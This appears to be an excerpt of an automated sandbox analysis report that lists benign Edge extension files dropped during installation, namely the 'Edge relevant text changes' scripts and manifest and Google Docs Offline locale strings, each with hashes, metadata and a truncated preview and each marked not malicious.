                                                                                                                                                            Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_330363768\CRX_INSTALL\content.js

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9815
                                                                                                                                                            Entropy (8bit):6.1716321262973315
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                            MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                            SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                            SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                            SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_330363768\CRX_INSTALL\content_new.js

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):10388
                                                                                                                                                            Entropy (8bit):6.174387413738973
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                            MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                            SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                            SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                            SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_330363768\CRX_INSTALL\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):962
                                                                                                                                                            Entropy (8bit):5.698567446030411
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                            MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                            SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                            SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                            SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_330363768\c6ee5f4d-7ef9-4f6b-8cc0-e4f4c8174370.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11185
                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\584404b7-a625-40ed-bb64-20dda24c701d.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):154477
                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\128.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4982
                                                                                                                                                            Entropy (8bit):7.929761711048726
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                            MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                            SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                            SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                            SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):908
                                                                                                                                                            Entropy (8bit):4.512512697156616
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                            MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                            SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                            SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                            SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1285
                                                                                                                                                            Entropy (8bit):4.702209356847184
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                            MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                            SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                            SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                            SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1244
                                                                                                                                                            Entropy (8bit):4.5533961615623735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                            MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                            SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                            SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                            SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):977
                                                                                                                                                            Entropy (8bit):4.867640976960053
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                            MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                            SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                            SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                            SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3107
                                                                                                                                                            Entropy (8bit):3.535189746470889
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                            MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                            SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                            SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                            SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1389
                                                                                                                                                            Entropy (8bit):4.561317517930672
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                            MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                            SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                            SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                            SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1763
                                                                                                                                                            Entropy (8bit):4.25392954144533
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                            MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                            SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                            SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                            SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):930
                                                                                                                                                            Entropy (8bit):4.569672473374877
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                            MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                            SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                            SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
